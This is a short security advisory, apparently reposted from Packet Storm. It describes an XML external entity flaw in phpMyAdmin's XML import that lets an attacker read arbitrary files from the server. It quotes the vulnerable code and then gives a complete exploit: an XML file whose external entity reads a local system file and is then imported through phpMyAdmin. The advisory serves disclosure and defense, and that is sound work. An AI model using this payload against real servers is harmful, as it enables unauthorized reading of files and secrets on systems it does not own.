phpMyAdmin suffers from a remote arbitrary file reading vulnerability when using a simplexml_load_string function meant to read xml from user input.
e9107c1ea9ecd076a0b594c54978d18ecaa5e210966639afd6ab79b6715853a9Hi
80sec report this bug on wooyun,PhpMyadmin use a simplexml_load_string
function to read xml from user input,this may be exploied to read files
from the server or network
in libraries/import/xml.php,some code like this
/**
* Load the XML string
*
* The option LIBXML_COMPACT is specified because it can
* result in increased performance without the need to
* alter the code in any way. It's basically a freebee.
*/
$xml = simplexml_load_string($buffer, "SimpleXMLElement", LIBXML_COMPACT);
unset($buffer);
/**
* The XML was malformed
*/
if ($xml === FALSE) {
so you just need to make a xml like this
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE wooyun [
<!ENTITY hi80sec SYSTEM "file:///c:/windows/win.ini">
]>
<pma_xml_export version="1.0" xmlns:pma="
http://www.phpmyadmin.net/some_doc_url/">
<!--
- Structure schemas
-->
<pma:structure_schemas>
<pma:database name="test" collation="utf8_general_ci"
charset="utf8">
<pma:table name="ts_ad">
&hi80sec;
</pma:table>
</pma:database>
</pma:structure_schemas>
<!--
- Êý¾Ý¿â: 'thinksns'
-->
<database name="thinksns">
<!-- ±í ts_ad -->
</database>
</pma_xml_export>
then import this xml in PhpMyAdmin,you will get the content you want.
From:http://www.wooyun.org/bugs/wooyun-2010-03185
:)
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed